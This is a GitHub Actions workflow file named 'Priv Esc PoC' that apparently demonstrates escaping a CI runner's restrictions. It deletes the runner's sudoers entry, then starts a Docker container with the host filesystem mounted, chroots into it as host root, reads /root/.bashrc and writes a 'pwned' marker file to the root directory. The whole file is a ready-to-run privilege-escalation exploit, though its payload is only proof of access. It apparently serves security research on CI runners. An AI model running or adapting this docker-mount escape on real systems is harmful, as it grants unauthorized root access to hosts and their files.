name: Priv Esc PoC

on:
  push:
  workflow_dispatch:

jobs:
  break-sudo:
    runs-on: ubuntu-latest
    steps:
      - name: Remove sudoers.d for runner
        run: sudo rm /etc/sudoers.d/runner

      - name: Docker -> Host Root PoC
        run: |
          echo
          echo "Starting container and chrooting into host"
          docker run --rm -v /:/host ubuntu bash -c '
            echo "Inside container (we should be root here):"
            whoami
            id

            echo "chroot into host filesystem and run commands as host root"
            chroot /host bash -c "
              echo \"Post chroot command now\" 
              echo \"whoami: \$(whoami)\"
              echo \"id: \$(id)\"
              
              echo
              echo \"tested by reading /root/.bashrc as proof \"
              head -n 10 /root/.bashrc || echo \"could not read /root/.bashrc\"

              echo
              echo \"Creating poc file at /pwned_by_root_from_github_actions.txt\"
              echo \"pwned by github actions\" > /pwned_by_root_from_github_actions.txt
              ls -l /pwned_by_root_from_github_actions.txt || true
            "
          '
    
          echo
          echo "Back on host as runner, verifying root-created poc file using priv esc"
          ls -l /pwned_by_root_from_github_actions.txt || echo "poc file missing (exploit failed)"
